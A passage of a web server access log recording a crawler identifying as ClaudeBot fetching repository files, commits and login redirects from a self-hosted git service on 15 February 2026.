(KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/Dockerfile" [Client 216.73.216.188] [Length 859] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.gitignore" [Client 216.73.216.188] [Length 119] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs" [Client 216.73.216.188] [Length 11003] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/services" [Client 216.73.216.188] [Length 9889] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/script.js?display=source" [Client 216.73.216.188] [Length 14888] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/status.json" [Client 216.73.216.188] [Length 4249] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/package.json" [Client 216.73.216.188] [Length 810] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/package.json" [Client 216.73.216.188] [Length 9762] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" [Client 216.73.216.188] [Length 16031] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/Dockerfile?display=source" [Client 216.73.216.188] [Length 12685] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/requirements.txt" -[15/Feb/2026:09:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/types.ts" [Client 216.73.216.188] [Length 11741] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/updateRecord.md?display=rendered" [Client 216.73.216.188] [Length 16024] [Gzip 2.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook" [Client 216.73.216.188] [Length 10284] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/update_status.py" -[15/Feb/2026:09:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/index.html?display=source" [Client 216.73.216.188] [Length 32748] [Gzip 9.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/.TemporaryDocument/claude.md" -[15/Feb/2026:09:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/README.md" [Client 216.73.216.188] [Length 9824] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/archive/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3.zip" [Client 216.73.216.188] [Length 328213] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/start.sh" [Client 216.73.216.188] [Length 939] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.gitignore" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/index.tsx" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/docker-compose.yml" [Client 216.73.216.188] [Length 12614] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/main...a0a212e41c7ebc2699ea736d71d145b9844673ec" [Client 216.73.216.188] [Length 8440] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/index.tsx" -[15/Feb/2026:09:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.gitignore" -[15/Feb/2026:09:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/status.json" [Client 216.73.216.188] [Length 11041] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d.diff" [Client 216.73.216.188] [Length 2501] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/TestService.csproj?display=source" [Client 216.73.216.188] [Length 11543] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" [Client 216.73.216.188] [Length 9906] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/fetcher.py?display=source" [Client 216.73.216.188] [Length 19428] [Gzip 5.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/README.md" [Client 216.73.216.188] [Length 941] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.gitignore?display=source" [Client 216.73.216.188] [Length 11130] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Contact.tsx" [Client 216.73.216.188] [Length 16663] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/status.json" [Client 216.73.216.188] [Length 11302] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/.TemporaryDocument/claude.md" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/import_csv.py?display=rendered" [Client 216.73.216.188] [Length 11173] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/.TemporaryDocument/claude.md" -[15/Feb/2026:09:30:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/find/commit/3181052619700dceeeef81a9a0851130498f177e" [Client 216.73.216.188] [Length 7500] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.assets.json?display=rendered" [Client 216.73.216.188] [Length 10936] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/About.tsx" [Client 216.73.216.188] [Length 14166] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Footer.tsx" [Client 216.73.216.188] [Length 14446] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" [Client 216.73.216.188] [Length 2071] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/find/commit/18fa480c84b358da8bf50d54057f53591759225f" [Client 216.73.216.188] [Length 7506] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.nuget.cache?display=rendered" [Client 216.73.216.188] [Length 10943] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Hero.tsx" [Client 216.73.216.188] [Length 14102] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcompare%2Fmain..main" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/updateRecord.md" [Client 216.73.216.188] [Length 9831] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/js/script.js?display=rendered" [Client 216.73.216.188] [Length 10951] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main" [Client 216.73.216.188] [Length 387741] [Gzip 13.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/main.py" [Client 216.73.216.188] [Length 24867] [Gzip 6.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal" [Client 216.73.216.188] [Length 10500] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.gitignore" [Client 216.73.216.188] [Length 12208] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/global.json" [Client 216.73.216.188] [Length 9881] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/index.html" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/types.ts" [Client 216.73.216.188] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/index.html" -[15/Feb/2026:09:30:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/README.md?display=source" [Client 216.73.216.188] [Length 16014] [Gzip 4.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/start.sh" [Client 216.73.216.188] [Length 3718] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets" [Client 216.73.216.188] [Length 10727] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e" [Client 216.73.216.188] [Length 10059] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data" [Client 216.73.216.188] [Length 10618] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/docker-compose.yml?display=rendered" [Client 216.73.216.188] [Length 11165] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 216.73.216.188] [Length 10298] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/main.py?display=rendered" [Client 216.73.216.188] [Length 10911] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/models.py" [Client 216.73.216.188] [Length 13587] [Gzip 4.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.gitignore" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/DCS.html" [Client 216.73.216.188] [Length 22683] [Gzip 7.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/status.json" [Client 216.73.216.188] [Length 10485] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.gitignore" -[15/Feb/2026:09:30:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0" [Client 216.73.216.188] [Length 11298] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/services" [Client 216.73.216.188] [Length 9772] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/start.sh?display=source" [Client 216.73.216.188] [Length 15172] [Gzip 4.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/status.json?display=source" [Client 216.73.216.188] [Length 11297] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr 